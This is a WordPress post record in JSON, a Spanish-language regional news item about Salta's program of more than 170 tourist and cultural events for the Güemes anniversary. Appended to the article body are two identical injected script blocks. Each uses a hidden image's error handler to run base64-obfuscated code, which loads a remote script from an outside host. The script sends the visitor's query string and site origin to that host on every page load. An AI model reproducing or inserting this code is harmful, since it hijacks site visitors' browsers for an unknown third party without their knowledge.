{"id":2684,"date":"2023-06-02T21:03:01","date_gmt":"2023-06-03T00:03:01","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2684"},"modified":"2025-08-14T00:16:00","modified_gmt":"2025-08-14T03:16:00","slug":"salta-se-prepara-para-honrar-la-memoria-de-guemes-con-mas-de-170-eventos-turisticos-y-culturales","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2684","title":{"rendered":"Salta se prepara para honrar la memoria de G\u00fcemes con m\u00e1s de 170 eventos tur\u00edsticos y culturales"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-black-color has-text-color has-background\" style=\"background-color:#b0173d\"><strong><em>En el inicio de un nuevo aniversario del paso a la inmortalidad del h\u00e9roe nacional, se present\u00f3 el Calendario de Actividades con fecha central el 17 de junio. La agenda completa puede consultarse en www.saltacalendario.gob.ar<\/em><\/strong><\/h4>\n\n\n\n<p>El mes de conmemoraci\u00f3n del paso a la inmortalidad del h\u00e9roe nacional&nbsp;<strong>Mart\u00edn Miguel de G\u00fcemes<\/strong>&nbsp;es un momento especial en Salta, donde se llevan a cabo numerosas actividades tur\u00edsticas y culturales en honor a este destacado h\u00e9roe de la gesta independentista. El Calendario de Actividades Tur\u00edsticas y Culturales, organizado conjuntamente por el Ministerio de Turismo y la Secretar\u00eda de Cultura<strong>,<\/strong>&nbsp;presenta m\u00e1s de 170 eventos para que tanto los turistas como los salte\u00f1os puedan participar.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7345-salta-se-prepara-para-honrar-la-memoria-de-guemes-con-mas-de-170-eventos-turisticos-y-culturales.JPG\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7345-salta-se-prepara-para-honrar-la-memoria-de-guemes-con-mas-de-170-eventos-turisticos-y-culturales.JPG\" alt=\"Salta se prepara para honrar la memoria de G\u00fcemes con m\u00e1s de 170 eventos tur\u00edsticos y culturales\" width=\"272\" height=\"190\"\/><\/a><\/figure><\/div>\n\n\n<p>Estas actividades abarcan una amplia variedad de opciones, incluyendo ferias, eventos gastron\u00f3micos, culturales, musicales, conferencias y exposiciones. Durante todo el mes, se llevar\u00e1n a cabo diferentes eventos en toda la provincia de Salta, brindando a los visitantes la oportunidad de sumergirse en la historia y la importancia de Mart\u00edn Miguel de G\u00fcemes para los salte\u00f1os.<\/p>\n\n\n\n<p>El ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, destac\u00f3 la importancia de estas actividades y resalt\u00f3 la cantidad significativa de eventos programados. Adem\u00e1s, mencion\u00f3 que Salta fue el destino m\u00e1s elegido en el programa Previaje IV, lo que demuestra el inter\u00e9s de los turistas en experimentar la historia y la cultura de la provincia, as\u00ed como comprender el legado de G\u00fcemes.<\/p>\n\n\n\n<p><strong>Mar\u00eda<\/strong>&nbsp;<strong>Jos\u00e9 Fascio<\/strong>, coordinadora general de la Secretar\u00eda de Cultura, agradeci\u00f3 a los presentes y destac\u00f3 actividades espec\u00edficas del Museo G\u00fcemes y la Casa de la Cultura. \u201cEs un placer recibirlos en la Casa de G\u00fcemes, en donde llevaremos a cabo actividades a salte\u00f1os, salte\u00f1as, residentes y visitantes. Celebramos la articulaci\u00f3n junto al Ministerio de Turismo y Deportes, presentaciones de libros, presentaciones art\u00edsticas en homenaje al H\u00e9roe Gaucho, visitas guiadas y destinadas a instituciones educativas son algunas de las actividades que inician y culminan este mes tan especial para los salte\u00f1os\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7346-salta-se-prepara-para-honrar-la-memoria-de-guemes-con-mas-de-170-eventos-turisticos-y-culturales.JPG\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7346-salta-se-prepara-para-honrar-la-memoria-de-guemes-con-mas-de-170-eventos-turisticos-y-culturales.JPG\" alt=\"Salta se prepara para honrar la memoria de G\u00fcemes con m\u00e1s de 170 eventos tur\u00edsticos y culturales\" width=\"264\" height=\"184\"\/><\/a><\/figure><\/div>\n\n\n<p>Asimismo, la funcionaria anticip\u00f3 que \u201cel 15 de junio en Casa de la Cultura a partir de las 19, Felipe Pigna presentar\u00e1 \u2018Sin G\u00fcemes, la Argentina con suerte terminaba en C\u00f3rdoba\u2019 con entrada libre y gratuita\u201d. \u201cEsta presentaci\u00f3n se realiza en articulaci\u00f3n con Editorial Planeta y posiciona a Salta como uno de los principales destinos elegidos para esta ocasi\u00f3n, por la importancia que reviste la figura del General G\u00fcemes como pr\u00f3cer y padre de la Patria a 202 a\u00f1os de su paso a la inmortalidad\u201d finaliz\u00f3.<\/p>\n\n\n\n<p>Tambi\u00e9n particip\u00f3 la secretaria de Turismo&nbsp;<strong>Nadia Loza<\/strong>, la directora civil del Museo del Ej\u00e9rcito Argentino, Virginia&nbsp;<strong>Pastrana<\/strong>&nbsp;y el presidente de la Comisi\u00f3n Guardia Bajo Las Estrellas,&nbsp;<strong>Jorge Gianella<\/strong>.<\/p>\n\n\n\n<p>La agenda completa puede consultarse en\u00a0<a href=\"http:\/\/www.saltacalendario.gob.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">http:\/\/www.saltacalendario.gob.ar<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-se-prepara-para-honrar-la-memoria-de-guemes-con-mas-de-170-eventos-turisticos-y-culturales-89956\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el inicio de un nuevo aniversario del paso a la inmortalidad del h\u00e9roe nacional, se present\u00f3 el Calendario de Actividades con fecha central el 17 de junio. La agenda completa puede consultarse en www.saltacalendario.gob.ar El mes de conmemoraci\u00f3n del paso a la inmortalidad del h\u00e9roe nacional&nbsp;Mart\u00edn Miguel de G\u00fcemes&nbsp;es un momento especial en Salta, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2685,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,8,15],"tags":[],"class_list":{"0":"post-2684","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-eventos","9":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2684"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2684"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2684\/revisions"}],"predecessor-version":[{"id":7071,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2684\/revisions\/7071"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2685"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2684"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2684"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2684"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}